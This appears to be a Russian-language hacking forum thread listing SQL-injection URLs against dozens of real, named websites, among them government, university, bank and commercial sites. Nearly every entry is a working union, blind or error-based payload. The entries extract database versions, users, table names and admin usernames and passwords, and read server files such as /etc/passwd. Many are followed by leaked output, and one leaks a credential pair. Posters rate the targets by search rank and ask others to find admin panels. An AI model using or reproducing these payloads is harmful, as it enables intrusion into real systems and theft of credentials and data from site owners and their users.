http://www2.parquebiologico.pt/doc.php?id=-22+union+select+1,2,concat_ws(0x3a,user(),database (),version()),4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33--

5.0.67-community
http://www.gai-mn.org/contact.php?id=-3+union+select+version(),2--

5.0.41
http://www.publicnewsservice.org/contact.php?id=-1+union+select+1,version(),3,4--

5.0.32-Debian_7etch11-log
http://cox.nofuture.org.uk/contacts/contact.php?id=-86+union+select+1,2,3,4,5,6,version(),8,9,10,11,12--

http://www.compareplastic.com/display.php?id=-1%20union%20select%20concat%28table_name,0x20,colu mn_name,0x20,table_schema%29%20from%20information_ schema.columns%20limit%20205,2/*&page=cat

http://www.pcdiscounters.com/products.php?groupID=-1+union+select+1,concat%28table_name,0x20,column_n ame,0x20,table_schema%29+from+information_schema.c olumns+limit+177,200

http://jennisonqc.com/search_result.php?part_id=-1%20union%20select%201,2,version%28%29,4,5,6,7,8,9 ,10,11,12,13,14

http://www.coastalgoods.com/product_list.php?cat_id=-1+union+select+1,2,concat%28table_name,0x20,column _name,0x20,table_schema%29+from+information_schema .columns+limit+223,10

http://www.alvaco.com/products_detail.php?prod_id=-1 union select 1,concat(table_name,0x20,column_name,0x20,table_sc hema),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from information_schema.columns limit 230,1

http://lifemusic.su/show_cat2.php?grid=-1+union+select+concat_ws(0x3a,username,password,us er(),version())+from+admin--
тиц 10
lifemusic_mysql@10.1.104.46:4.1.22-log

4.1.25-log:wwwmetronicsru:metronic@localhost
http://metronics.ru/good.php?id=-1942943971+union+select+1,2,3,concat_ws(0x3a,versi on(),database(),user())--


sinergy@localhost:letturelibere:5.0.45-community-nt
http://www.letturelibere.net/download.php?id=-242+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,user (),database(),version()),9,10,11,12,13,14--


dannyjgb2@linweb4.atlas.pipex.net:dannyjgb2:5.0.68-percona-3-log
http://www.infobite.co.uk/UsedProducts/make.php?ID=-63+union+select+concat_ws(0x3a,user(),database(),v ersion()),2--


jdson@linweb4.atlas.pipex.net:jdson:5.0.68-percona-3-log
http://www.theprintroomsupplycompany.co.uk/NewProducts/make.php?ID=-1+union+select+1,concat_ws(0x3a,user(),database(), version())--


apishop@localhost:apishop:4.0.27
http://www.apishop.ru/good.php?id=-121+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,user (),database(),version())--



SITE@GATORADE.DREAMHOST.COM:STEPH:5.0.67-USERSTATS-LOG
http://www.sgoralnick.com/design.php?id=-213+union+select+1,2,3,4,concat_ws(0x3a,user(),dat abase(),version()),6,7,8,9,10,11,12,13,14--


gra34464_user@localhost:gra34464_graphix:4.1.22-standard-log
http://graphixsolutions.com.au/graphic-design.php?id=-14+union+select+1,2,3,concat_ws(0x3a,user(),databa se(),version()),5,6,7,8--


resist@70.32.74.49:sizefactory:5.0.45-log
http://www.sizefactory.com/design.php?id=-2+union+select+1,2,3,concat_ws(0x3a,user(),databas e(),version()),5--


stoneast@localhost:stoneast:5.0.77
http://www.stoneast.com/php/design/design.php?id=-2+union+select+1,concat_ws(0x3a,user(),database(), version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21--


jnoa@gatorade.dreamhost.com:jnoa_index:5.0.67-userstats-log
http://jeremynoa.com/site/design.php?id=-17+union+select+1,2,3,4,concat_ws(0x3a,user(),data base(),version()),6,7--

http://forums.patchtimer.org/mobile/thread.php?id=-8517+union+select+1,concat_ws(char(32,58,32),user( ),database(),version())--&forum=6&start=20
joshscho_jschoof@localhost : joshscho_ptforums : 5.0.81-community-log

http://forums.patchtimer.org/mobile/thread.php?id=-8517+union+select+1,concat_ws(char(32,58,32),user_ group,user_name,user_password)+from+joshscho_coppe rmine.schoof_users--&forum=6&start=20


http://forums.patchtimer.org/mobile/thread.php?id=-8517+union+select+1,concat_ws(char(32,58,32),user_ group,user_name,user_password)+from+joshscho_duag. cpg14x_users--&forum=6&start=20


http://forums.patchtimer.org/mobile/thread.php?id=-8517+union+select+1,concat_ws(char(32,58,32),usern ame,user_password,user_level)+from+joshscho_hhguil d.phpbb_users--&forum=6&start=20


PS. Понравился юмор, вместо Page 404: "This page has been viewed 1,185,131 times. Why we will never know."

Visibledust.com pr5
VisibleDust is the renowned producer of high quality DSLR cleaning products, especially tailored for the digital sensor.
http://www.visibledust.com/products3.php?pid=-3'+union+select+null,null,null,null,null,null,conc at_ws(char(32,124,32),version(),user(),database()) ,null,null,null,null,null,null,null,null,null,null ,null,null,null,null+--+
http://www.visibledust.com/products3.php?pid=-3'+union+select+null,null,null,null,null,null,conc at_ws(char(32,124,32),name,address,city,province,c ountry,postal,telephone,fax,email,website),null,nu ll,null,null,null,null,null,null,null,null,null,nu ll,null,null+from+visibled_cart.distributors+limit +0,1+--+5.0.67-log | visibled_9@localhost | visibled_cart

http://www.most.zp.ua/history/index.php?id_article=31+UNION+SELECT+1,2,3,4,5,6,7 ,8,9+LIMIT+1,1

Database Version: 4.1.22-log
Database name: most
User name: most@beta

http://www.kanatka.crimea.ua/article/index.php?id_article=9+UNION+SELECT+1,2,3,4,5,6,7, 8,9+LIMIT+1,1

Database Version: 5.0.81-community
Database name: kanatka_base
User name: kanatka_user@localhost

http://www.sevhwarang.com.ua/article/index.php?id_article=2+UNION+SELECT+1,2,3,4,5,6,7, 8,9+LIMIT+1,1
Database Version: 4.1.22-log
Database name: sevhwarang
User name: u_sevhwarang@localhost

http://www.4justice.info/shownews.php?id=-4+union+select+1,2,3,4+from+mysql.user+--+

http://www.ffbg.hartberg.info/shownews.php?id=-17+union+select+1,user,3,4,5+from+users+/*+

http://www.parssupporterstrust.co.uk/index.php?ID=-1932'+uNiOn+sElEct+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30, 31,32,33,34+--+&CATEGORY2=3-News

http://www.opera-rennes.fr/index.php?id=2796&theme=-35+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws( 0x3a3a,tstamp,username,password,admin),13,14,15,16 ,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,3 3,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49, 50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66 ,67,68,69+from+be_users+/*+

http://www.lampire.com/news/article.php?news_id=-000000017'+union+select+1,2,3,4,concat_ws(0x3a3a,u ser_email,user_pw),6,7+from+Users+limit+1,1+--+

http://www.unlockmorerock.com/news-article.php?news_id=-4'+union+select+1,2,3,concat_ws(0x3a3a,username,pa ssword,email),5,6,7+from+rock_users+/*+

http://kennyloggins.com/news-article.php?news_id=-12'+union+select+1,2,3,4,5,6+/*+

http://www.dckconcessions.com/news/article.php?news_id=-27'+union+select+1,username,3,4,5,6+from+user+--+

http://www.aaronhifi.com/news-article.php?news_id=-8+uNiOn+sElEct+1,group_concat(tAble_Name),3,4,5+fr om+information_schema.tables+--+

http://www.namcnevada.com/news/article.php?news_id=-47+union+select+1,2,3,4,5,6,7,8,9+/*+

http://www.thaidye.com/showall.php?ID=-1+union+select+1,database%28%29,version%28%29,4,5, 6,7,8,9,10,11,12,13,14,15,16,17,18--

thaidye_items
5.0.67-community

всем желаю великих денег

4.1.25-Debian_mt1
http://www.fisticuffdesign.com/portfolio.php?id=-9+union+select+1,version(),3,4,5,6,7,8,9,10,11,12, 13,14,15--

5.0.81-community
http://www.landmarkarchitects.net/portfolio.php?id=-1+union+select+1,2,3,4,version(),6--

4.1.22-max-log
http://www.exemplarindia.net/portfolio.php?id=-31+union+select+1,version(),3,4,5,6,7,8,9,10,11,12 ,13,14,15,16--

5.0.81-community-log
http://www.jcinteractive.net/portfolio.php?id=-3+union+select+1,2,3,4,5,6,version(),8--

5.0.75
http://chomis.net/portfolio.php?id=-48+union+select+1,version(),3,4,5,6,7,8,9,10,11,12--

4.1.25-Debian_mt1
http://studiogreen.net/portfolio.php?id=-8+union+select+1,version(),3,4,5,6,7,8,9,10--

4.1.22-standard
http://www.kwakk.com/portfolio.php?id=-8+union+select+1,2,3,version(),5,6,7,8,9,10,11,12, 13,14--

Казанский государственный медицинский университет.Web-портал научной части.
http://ajp.infomed.su/med_info/profile/nirdetail.jsp?id=-27+union+select+1,concat_ws(0x3a,database(),user() ,version()),3,4,5,6,7,8,9
med_info:root@127.0.0.1:5.0.45

http://www.niigb.ru/?id=-17+union+select+1,2,3,concat_ws(0x3a,version(),use r(),database()),5,6/*

4.1.25-log:niigb@localhost:wwwniigbru_cmsmy_niigb

все на сайте
http://www.coshuk.com/html/images.php?id=-38+union+select+1,concat_ws(0x3a,id,loginname,name lc,email,created,modifiedby,password,passwordchang ed,superuser,disabled),3,4,5,6,7,8,9,10,11,12,13+f rom+phplist_admin--

http://www.eumetech.com/l.php?id=1+anD+1=8%20+uniON+all+seLEcT+login+from+ users/*

http://www.trends-in-newsrooms.org/articles.php?id=-20+union+all+select+load_file('/etc/passwd'),2,3,4,5,6,7--

http://www.trends-in-newsrooms.org/articles.php?id=-20+union+all+select+load_file('/etc/php5/apache2/php.ini'),2,3,4,5,6,7--

http://www.nchla.org/actiondisplay.asp?ID=2 or 2=@@version

Version: Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Desktop Engine on Windows NT 5.2 (Build 3790: Service Pack 1)

И ещё какие то Microsoft JET Database:
Нагуглил чо то про Jet Database, вот так примерно делать надо.
http://www.agenceglobal.com/article.asp?id=10+UNION+exec+master..xp_cmdshell+' dir'

http://www.thetruthseeker.co.uk/article.asp?ID=10+UNION+exec+master..xp_cmdshell+' dir'

http://faganmedia.com/profile.php?id='+UNION+SELECT+1,2,3,4,5,load_file( '/etc/passwd'),7,8,9--+

http://www.ilpkl.gov.my/alumni/dataDetail.php?recordID=-20+union+all+select+1,2,load_file('/etc/passwd'),user(),version(),6,7,concat(user,0x3a,pas sword),9,10+from+mysql.user--
http://www.ilpkl.gov.my/alumni/dataDetail.php?recordID=-20+union+all+select+1,2,load_file('/etc/httpd/conf/httpd.conf'),4,5,6,7,8,9,10--
http://www.ilpkl.gov.my/alumni/dataDetail.php?recordID=-20+union+all+select+1,2,load_file('/etc/httpd/php.ini'),4,5,6,7,8,9,10--
root@localhost, 5.0.37

хрум
http://njiiahc.rutgers.edu/LessonPlans/index.php?cn=-9+union+select+1,username,password,4,5,6,7,8,9+fro m+db_user/*

ТИЦ: 20
PR: 4

http://www.daedalic.de/index.php?modus=-news'+union+select+1,2,3,4,concat_Ws(0x3a,user(),d atabase(),version()),6,7,8,9,10+--+&lang=en

U281335@gosbar.store:DB281335:5.0.67-log

Министерство транспорта Российской Федерации
http://www.mintrans.ru/menu/menu.aspx?lvl=2&fl=0&prt=35+union+select+1,@@version,3,4+from+presspage
Microsoft SQL Server 2005 - 9.00.4035.00 (Intel X86)
Nov 24 2008 13:01:59
Copyright (c) 1988-2005 Microsoft Corporation
Workgroup Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

http://www.findsubtitles.com/latest.php?page=-864+union+select+1,2,version(),4--
5.0.81-community-log

http://www.traubfuneralhome.com/display.php?id=1876+UNION+SELECT+1,2,3,4,5,6,7,8,9 ,10,11,12,13,14,15,16

Database Version: 5.0.45-community-nt
Database name: traubdata
User name: traubdata@localhost

24 :In database traubdata found table users
1 : user_id
2 : user_name
3 : user_password

хто админку найдеть напишите в личку

http://love-gorod.com/index.php?anketa=58+UNION+SELECT+AES_DECRYPT(AES_E NCRYPT(CONCAT(0x7873716C696E6A626567696E,Version() ,0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716 C696E6A656E64),0x71),0x71),2,3,4,5,6,7,8,9,10,11--
Database Version: 5.0.67-community
Database name: admin_love
User name: admin_love@localhost

http://www.office-direct.biz/news/id52+UNION+SELECT+1,version%28%29,3,4,5,6,7+LIMIT+ 1,1--
Database Version: 5.0.45-log
Database name: ofdir
User name: ofdir@localhost

http://www.conab.gov.br/conabweb/index.php?PAG=1+and+1=cast((select+version()||chr( 58)||user)||chr(58)||current_database()+as+int)

PostgreSQL 8.2.9 on x86_64-unknown-linux-gnu, compiled by GCC gcc (GCC) 4.1.2 20061115 (prerelease) (Debian 4.1.1-21):conabweb:bd_conabweb

Gameguru Mania
root@localhost : box : 5.0.32-Debian_7etch8-log

http://www.ggmania.com/cheatprint.php3?cheat=0+union+all+select+1,CONCAT_ WS(0x203a20,user(),database(),version()),3,CONCAT_ WS(0x203a20,user,password),5+from+mysql.user/*

http://www.ggmania.com/cheatprint.php3?cheat=0+union+all+select+1,load_fi le(0x2F6574632F706173737764),3,4,5/*

redboss@localhost:mobilegamesdb_com:5.0.51a-24+lenny1-log
http://www.mobilegamesdb.com/game.php?id=-369+union+select+concat_ws(0x3a,user(),database(), version()),2,3,4,5,6,7--

http://isic-lipetsk.ru/?com=cat&id=-19+union+select+concat_ws(char(58,58),user(),datab ase(),%20version())--
isiclipe@fe9.hc.ru::wwwisiclipetskru::4.1.25-log

http://www.ctyfc.co.uk/team.php?id=-8+union+select+concat_ws(char(58,58),user(),databa se(),version()),2,3/*
uk2camberlecouk22457_1@superultra6.uk2.net::uk2cam berlecouk22457_1::4.0.24-log

MTV.co.kr pr5
MTV Корея :)
http://www.mtv.co.kr/tv/truemusiclive/content.php?pid=85+and+substring(version(),1,1)=5+--+mysql: 5.0.51a-3ubuntu5.4-log
database(): mtv4
user(): mtvkor@www

Procredit bank

http://www.procreditbank.ro/hr_job_details.php?id=31+and+substring(@@version,1 ,1)=5

Официальный международный фан-клуб Русланы
http://fanclub.ruslana.ua/ru/national.php?country=-65%20union%20select%20username%20FROM%20admins
http://fanclub.ruslana.ua/ru/national.php?country=-65%20union%20select%20username%20FROM%20users
http://fanclub.ruslana.ua/myadmin/
Версия 5.0.86

66 полей, жесть
http://www.pxel.ru/index.php?d=b&iduni=-15541+union+select+1,concat_ws(char(58,58),user(), database(),version()),3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,3 1,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47, 48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64 ,65,66--&from=ya
pxel@box.hc.ru::wwwpxelru::4.0.26
тиц 60 пр 4

springhousecaravanpark.co.uk PR-3

http://www.springhousecaravanpark.co.uk/detail.php?id=104+union+select+1,concat_ws(0x3a,ve rsion(),user(),database()),3,4,5,6,7+--+

5.0.45:bluesky@server213-171-218-146.livedns.org.uk:blueskyresorts

heathergate.co.uk PR-3

http://www.heathergate.co.uk/detail.php?id=132+union+select+1,concat_ws(0x3a,ve rsion(),user(),database()),3,4,5,6,7+--+

5.0.45:bluesky@server213-171-218-146.livedns.org.uk:blueskyresorts

eyecandy-promo.co.uk PR-2

http://www.eyecandy-promo.co.uk/page.php?p=1+union+select+1,2,3,4,5,6,7,8,9,10,11, 12,13,concat_ws(0x3a,version(),user(),database())+--+

Смотрим в сорцах в теге body, параметр id

layout_5.0.77:ecdbadmin@server213-171-218-146.livedns.org.uk:icandydb

Comision Federal de Mejora Regulatoria
http://www.cofemer.gob.mx/historial.asp?menu_id=(select+@@version)
Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

4.1.12:admin@localhost
http://www.dwarvenforge.com/store/product.php?productid=16387)+union+select+concat_w s(0x203a20,host,user,password,file_priv),2+from+my sql.user/*
http://www.dwarvenforge.com/store/product.php?productid=16387)+union+select+load_fil e(0x2f6574632f706173737764),2/*

web@cgi31-ch.uk.clara.net : 5.0.18-nt
http://www.salmondevelopments.com/news.php?id=-999+union+all+select+1,unhex(hex(concat_ws(0x203a2 0,user(),version()))),3--

http://bigchina.ru/catalog/exhibitions/?cat=-311+union+select+1,concat_ws(char(58,58),user(),da tabase(),version()),3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17--
bigching_s@localhost::bigching_bigching::4.1.25-log
тиц 50 пр 3

knittingtradejournal.com PR-3

http://www.knittingtradejournal.com/news_details.php?id=-1173+union+select+1,concat_ws(0x3a,version(),user( ),database()),3,4,5,6,7,8,9+--+

5.0.45-community-log:ktjadmin@server213-171-218-146.livedns.org.uk:knittingtradejournal

imatek.co.uk PR-3 blind

http://www.imatek.co.uk/news-item.php?id=5+and+1=IF(ASCII(SUBSTRING((SELECT+ver sion()),1,1))=53,1,0)

version: 5.0.45
user: cmsimatek@server213-171-218-146.livedns.org.uk
database: cmsimatek

Колонки таблы cms_users


access
avatar
email
fullname
id
lastlogin
lastloginstatus
password
username
users


beeliefbotanics.com PR-4 фарма

http://www.beeliefbotanics.com/news.php?articleref=15+union+select+1,2,concat_ws( 0x3a,version(),user(),database()),4,5,6+--+

5.0.45-log:beeliefbot1@213.171.218.146:beeliefbot1

http://www.chestisvet.ru/index.php4?id=25&otv=-366+union+select+concat_ws(0x3a,version(),database (),user())+--+
Version: 4.1.22-standard-log
database: chestisv_klub
User: chestisv_klub@localhost

http://www.planeta-sirius.ru/index.php?p=11&kod=-14+union+select+concat_ws(char(58,58),user(),datab ase(),version()),2,3--
weber@10.0.1.206::weber::4.1.22-log
тиц 170 пр 4

Sybase ASE

http://www.inthebreeze.com/index.php?action=Products&rowid=manufacturer&manuid=1+and+1=convert(integer,(select+@@version))


Adaptive Server Enterprise/11.9.2.3/1159/P/SWR 9223 ESD 3/Linux Intel/Linux 2.2.5-15 i586/OPT/Tue Sep 5 06:37:26 2000

http://www.nlwaterpolo.nl/history/index.php?id=-40+union+select+database()+--+&pid=6
nlwaterpolo_nl_-_db

http://www.fwrema.ch/history/index.php?page=040000&id=-195+union+select+1,2,3,4,5,6+/*+&pics=history/1990/Reglement_Rettungsdienst

http://www.hooplife.ca/viewArticle.php?id=-327+union+select+1,concat_Ws(0x3a3a,ID,user,pass,t hegroup),3,4,5,6,7+from+cmsusers+--+

http://www.stevaroshop.nl/showall.php?id=-67+union+select+1,2,3,4,5,6+--+

http://www.ramcc.org/showall.php?id=-136+union+select+1,2,concat_ws(0x3a3a,nombre,pass) ,4,5,6,7,8,9,10,11+from+usuarios+limit+1,1+--+

pacmate_stfr1@localhost:pacmate_stfr1:5.0.85-community
http://www.pacmategear.com/user.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,user(),datab ase(),version()),6,7,8,9,10,11--



geogoing@localhost:geogoing:5.1.39
http://www.geogoing.com/user.php?id=-45+union+select+1,2,3,concat_ws(0x3a,user(),databa se(),version()),5--



u70694110@cgihost:d60627246:5.0.77-log
http://www.fairnessforfarmers.ca/news_one.php?id=-13+union+select+1,2,3,concat_ws(0x3a,user(),databa se(),version())--



nrskf1@121.52.209.130:nrskf1:5.0.40-log
http://www.skf1.cn/news_one.php?id=-23+union+select+concat_ws(0x3a,user(),database(),v ersion()),2,3,4,5--


cpobg_krindo@localhost:cpobg_krindo:5.0.81-community-log
http://www.cpo-bg.com/news_one.php?id=-4+union+select+1,concat_ws(0x3a,user(),database(), version()),3,4,5,6--

http://www.premer-mebel.ru/shop/?dir=-1+union+select+1,concat_ws(char(58,58),user(),data base(),version()),3,4,5,6,7,8--&pid=34
premermebel@localhost::db_premermebel::5.0.51a-community
Колонки в таблице pm_fsadmins
login
password
admin
vis
superadmin
fsmain
fsusers

zari1_ph@localhost : 4.1.14
http://www.megaworldmakati.com/payment.php?id=-3+union+select+1,concat_ws(0x203a20,user(),version ()),3,4,null,6,7,8,9,10+from+mysql.user--

4.1.22-standard-log : root@localhost
http://www.santaluciahighlands.com/profile.php?id=-1+union+all+select+1,concat_ws(0x203a20,version(), user(),host,user,password,file_priv),3,4,5,6,7,8,9 ,10,11,12,13,14,15+from+mysql.user
http://www.santaluciahighlands.com/profile.php?id=-1+union+all+select+1,load_file(0x2f6574632f7061737 37764),3,4,5,6,7,8,9,10,11,12,13,14,15--

Ministryofrum.com pr5
Ministry of Rum.
http://www.ministryofrum.com/rumdetails.php?r=500+and+substring(version(),1,1)= 4+--+

raidiofailte.com PR-6

http://www.raidiofailte.com/homepage_article.php?ID=-5+union+select+1,2,3,4,5,concat_ws(0x3a,version(), user(),database())+--+

5.0.45:rfdbsys@server213-171-218-146.livedns.org.uk:raidiofailtedb1

conservatoryoutlet.co.uk PR-4

http://www.conservatoryoutlet.co.uk/offers.php?id=336+union+select+concat_ws(0x3a,vers ion(),user(),database())+--+

5.0.45:motConOut08@server213-171-218-146.livedns.org.uk:conOutlet

http://www.unitoys.ru/index.php?r=3&man=25&l=-0+union+select+concat_ws(char(58,58),user(),databa se(),version())--
u76467@10.10.153.174::u76467::5.0.67-log
тиц 30 пр 3

http://svetlinz.ru/?idp=15&idn=2&ids=9&idt=-28+union+select+1,2,3,concat_ws(char(58,58),user() ,database(),version()),5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33,34,35,36,37,38,39,40--
svetli01@localhost::wwwsvetlinzru::4.1.25-log
тиц 10 пр 2

http://babylonia.ucsd.edu/views.php?id=6+and+1=0+union+select+1,2,3--

Фан клуб ФК Оболонь 4.0.27
http://www.ole.obolon.ua/index.php?id=-431%20union%20select%201,2,3,4,5,6,7,login,9,passw ord,11,12%20from%20user%20limit%2020,1/*

Газета Весник Кипра 5.0.32-Debian_7etch1~bpo.1-log
http://www.cyprusadvertiser.com/misc.php?id=-30%27union%20select%201,2,login,pass%20FROM%20admi n/*
5.0.81-community-log
http://encycl.anthropology.ru/article.php?id=1%20union%20select%201,usr_login,us r_pass,4,5,6,7,8,9,10%20FROM%20user%20limit%201,1% 20--
http://anthropology.ru:2082/
Фонд стратегической культуры 5.0.67-log
http://fondsk.ru/article.php?id=-1527%20union%20select%201,2,3,4,5,group_concat%28C OLUMN_NAME+separator+0x0a%29,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%20 FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20TABLE_ NAME=0x706572736F6E%20--
Shell-Shocked 4.1.22-standard
http://shell-shocked.org/article.php?id=-284%27%20union%20select%201,2,version%28%29,4,5,6, 7,8,9,10,11%20from%20admin/*
Какой то фестиваль музыкальный 4.1.22
http://www.krainamriy.com/news.php?id=-88%20union%20select%201,version%28%29,3,4,5,6,7,8, 9,10,11%20--

Arthouse
Созданная в 1996 году частной шведской компанией Maywin Media AB, "Кино без границ" — первая специализированная на арт-кино дистрибьюторская кинокомпания в России.

тИЦ: 1400
PR: 5

MsAccess
http://www.arthouse.ru/movie.asp?Code=TERADVOC'+union+select+111,name%2B' :'%2bpassword,3,4+from+users
Алексей Ушаков:ddZMOspg


European Forum For Good Clinical Practice

MsAccess
http://www.efgcp.be/Conference_details.asp?id=242+union+select+null,pa ss,null,44444,null,null,null,null,null,null,null,n ull+from+members+where+id=33&L1=10&L2=1&TimeRef=1
227771

http://www.vollversion.de/download/programmtitel.php4?id=-1418+union+select+concat_ws(0x3a,user(),database() ,version())+--+
User: vollversion@localhost
Database: vollversion
Version: 5.0.42

http://www.feldgrau.com/articles.php?ID=-67+union+select+1,2,3,4,5,6,table_name,null+from+i nformation_schema.tables+limit+1,200/*
думаю дальше все знают чё делать
Боян. Было уже.


http://www.cmc.dk/uk_udgivelse.php4?id=-453+union+select+concat_ws(0x3a,user(),database(), version()),2+--+

User: cmcdk2@light.securehosting.dk
Database: cmcdk2
Version: 4.0.24-log

Viana.es.gov.br pr3
Prefeitura Municipal de Viana.
http://www.viana.es.gov.br/site/index.php?target=noticia_leitura&nid=1+and+1=cast((select+chr(126)||chr(32)||curren t_database()||chr(32)||chr(124)||chr(32)||user||ch r(32)||chr(124)||chr(32)||version()||chr(32)||chr( 126))+as+int)~ viana | viana | PostgreSQL 8.4.1 on x86_64-pc-linux-gnu, compiled by GCC x86_64-pc-linux-gnu-gcc (GCC) 4.1.2 (Gentoo 4.1.2 p1.0.2), 64-bit ~

traintheater_db@localhost : 5.0.45
http://www.traintheater.co.il/show.php?id=-14+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x203a 20,user(),version()),11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7,38,39--

4.0.26-log : winar@222.124.162.139
http://sekolah-kita.net/info.php?aksi=detail&iden=-12+union+all+select+1,2,3,concat_ws(0x203a20,versi on(),user(),host,user,password,file_priv),5,6,7,8, 9,10+from+mysql.user--
http://sekolah-kita.net/info.php?aksi=detail&iden=-12+union+all+select+1,2,3,load_file(0x2F6574632F70 6173737764),5,6,7,8,9,10--
доступна сессия

http://afisha.vokrug.by/kino/?type=kt&kt_id=-10+union+select+1,2,3,concat_ws(char(58,58),user() ,database(),version())--
vokrugb_portal@localhost::vokrugb_portal::5.0.81-community
пр 3

PR3
http://la-femme.net/index.php?cat=%27+union+select+1,version%28%29+--+-
Database version:5.0.26-log;
Вывод в заголовок.

Магазин самурайского оружия 5.0.45
http://www.kitana.ru/razdel.php?id=-1%20union%20select%201,login,3,psw%20FROM%20person al
Киевский межународный институт социологии . 5.1.38-log.
http://www.kiis.com.ua/index.php?id=6&sp=1%20union%20select%201,2,3,4,COLUMN_NAME,6,7,8, 9%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20TA BLE_NAME=0x61646D696E%20--
CHARACTER_SETS. . COLLATIONS. . COLLATION_CHARACTER_SET_APPLICABILITY. . COLUMNS. . COLUMN_PRIVILEGES. . ENGINES. . EVENTS. . FILES. . GLOBAL_STATUS. . GLOBAL_VARIABLES. . KEY_COLUMN_USAGE. . PARTITIONS. . PLUGINS. . PROCESSLIST. . PROFILING. . REFERENTIAL_CONSTRAINTS. . ROUTINES. . SCHEMATA. . SCHEMA_PRIVILEGES. . SESSION_STATUS. . SESSION_VARIABLES. . STATISTICS. . TABLES. . TABLE_CONSTRAINTS. . TABLE_PRIVILEGES. . TRIGGERS. . USER_PRIVILEGES. . VIEWS. . _news_. . admin. . adminlog. . admins. . array_8_1. . array_8_2. . array_8_3. . art. . config. . content_l2. . content_main. . counter. . global_tpl. . group_admin. . html_pages. . html_tpl. . index_txt. . jos_banner. . jos_bannerclient. . jos_bannertrack. . jos_categories. . jos_components. . jos_contact_details. . jos_content. . jos_content_frontpage. . jos_content_rating. . jos_core_acl_aro. . jos_core_acl_aro_groups. . jos_core_acl_aro_map. . jos_core_acl_aro_sections. . jos_core_acl_groups_aro_map. . jos_core_log_items. . jos_core_log_searches. . jos_groups. . jos_jf_content. . jos_jf_tableinfo. . jos_languages. . jos_menu. . jos_menu_types. . jos_messages. . jos_messages_cfg. . jos_migration_backlinks. . jos_modules. . jos_modules_menu. . jos_newsfeeds. . jos_plugins. . jos_poll_data. . jos_poll_date. . jos_poll_menu. . jos_polls. . jos_sections. . jos_session. . jos_stats_agents. . jos_templates_menu. . jos_users. . jos_weblinks. . jos_xmap. . jos_xmap_ext. . jos_xmap_sitemap. . local_tpl. . news. . news_eng. . news_rus. . pages. . public. . public_eng. . public_rus. . section_site. . statindex.

http://www.maptrade.org/events/displayevent.php?id=-94+union+all+select+1,2,3,4,5,6,@@version,8,9,10,1 1,12--

Таблицы:
http://www.maptrade.org/events/displayevent.php?id=-94+union+all+select+1,2,3,4,5,6,group_concat(table _name),8,9,10,11,12+from+information_schema.tables +where+table_schema=database()--

Колонки:
http://www.maptrade.org/events/displayevent.php?id=-94+union+all+select+1,2,3,4,5,6,group_concat(colum n_name),8,9,10,11,12+from+information_schema.colum ns+where+table_schema=database()--

Юзеры:
http://www.maptrade.org/events/displayevent.php?id=-94+union+all+select+1,2,3,4,5,6,group_concat(Admin User_ID,0x3a,username,0x3a,password),8,9,10,11,12+ from%20admin--

http://www.scorcher.ru/idea_gallery/gallery_show.php?id=-47+union+select+1,2,3,4,5,6,version(),user(),9,10, 11,12,13,14,15
5.0.45-logscorcher0@localhost

PS. Таблиц около 750.

http://www.town.donetsk.ua/catalog/?s=-198+union+select+1,concat_ws(char(58,58),user(),da tabase(),version()),3--
u_town9a@localhost::town9a::5.0.44-log
тиц 40 пр 3
Таблиц и колонок очень много, есть бд форума phpbb, который на сайте сейчас не работает.

продолжаю http://www.specialtycareinc.com/doctors/department.php?id=-2+union+select+1,2,3

5.0.85-community

Логин:
http://www.sos-kazakhstan.kz/index.php?n=50+UNION+SELECT+1,2,3,4,5,6,login,8,9+ FROM+_users+LIMIT+0,1+--
Пароль:
http://www.sos-kazakhstan.kz/index.php?n=50+UNION+SELECT+1,2,3,4,5,6,pwd,8,9+FR OM+_users+LIMIT+0,1+--

http://www2.parquebiologico.pt/doc.php?id=-1+UNION+SELECT+1,2,concat(username,char(58),passwo rd,char(58),email),4,5,6,7,8,9,10,11,12,13,14,15,1 6,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32, 33+FROM+tbl_users+LIMIT+0,1+--

http://www.armes-deutschland.org/artikel.php4?artikel=-543+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws (0x3a,user(),database(),version()),13,14,15,16+--+&PHPSESSID=61fd2854f842696259918ce.
User: ftp16866@bender.webpack.hosteurope.de
Database: netzmuetze_de_2
Version: 5.0.32-Debian_7etch1~bpo.1-log

http://buddha.ru/news_one.php?id=-82+union+select+1,2,3,concat_ws(0x3a,user(),databa se(),version()),5,6,7,8,9--

user - [welcomeb_drup@v7.valuehost.ru]
database - [welcomeb_drup]
version - [4.0.27-log]

-----------


http://quality.ulstu.ru/index_base.php?adr=news/news_one.php&id=-34+union+select+1,2,3,concat_ws(0x3a,user(),databa se(),version())--

